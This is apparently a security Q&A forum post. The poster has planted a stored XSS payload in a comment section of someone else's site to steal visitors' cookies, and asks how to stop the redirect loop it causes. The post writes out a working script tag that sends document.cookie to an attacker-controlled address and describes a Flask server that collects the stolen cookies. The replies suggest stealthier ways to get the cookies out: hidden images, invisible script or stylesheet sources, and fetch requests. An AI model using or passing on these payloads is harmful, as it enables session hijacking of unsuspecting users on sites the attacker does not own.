# Stored XSS cookie stealing, but a loop of redirection

Tags: xss, cookies, url-redirection

I found a stored xss vulnerability on a comment section of a fun site and I wanted to steal cookies using xss attack.

So on my remote server I run an HTTP server with Flask using python where there is a script to steal the `document.cookie` and add it to my `cookies.txt`.

At the end of the script, I included `return redirect ("https://example.com")` where the stored xss comment occurs.

After that I go to the `example.com` and comment as anonymous user `<script>document.location="http://my.i.p.addr:port/?c=" +document.cookie;</script>`.

Everything works. When the user opens this `example.com` the cookie comes to me and redirects back to the original comment page.

But the problem is this becomes a loop. The user opens `example.com`, (**1**) my stored xss attack vector loaded so it comes to my server, and (**2**) my server redirects the user back to `example.com` where my stored xss attack vector is persistent. (**1**) and (**2**) are looping indefinitely and can't get rid of it. Any clues?

Comment: Why are you redirecting the user to your own site? Even if this doesn't result in a loop, it will still be detectable by users. Just add an image to the DOM with the `src` set to `"http://my.i.p.addr:port/?c=" + document.cookie`.

Comment: Images are also detectable, though you can hide them with CSS. Using an invisible element (such as a script or stylesheet) with the URL as the source is even less obvious. Alternatively, just send the cookies using XHR/fetch, as an unauthenticated cross-origin request. That way you don't even have to put them in the URL or DOM, so it will be even less obvious.

Comment: This looks like a coding issue or a flow logic issue, not a security issue.

Comment: Short answer: don't redirect the flow, simply call your server with the cookie info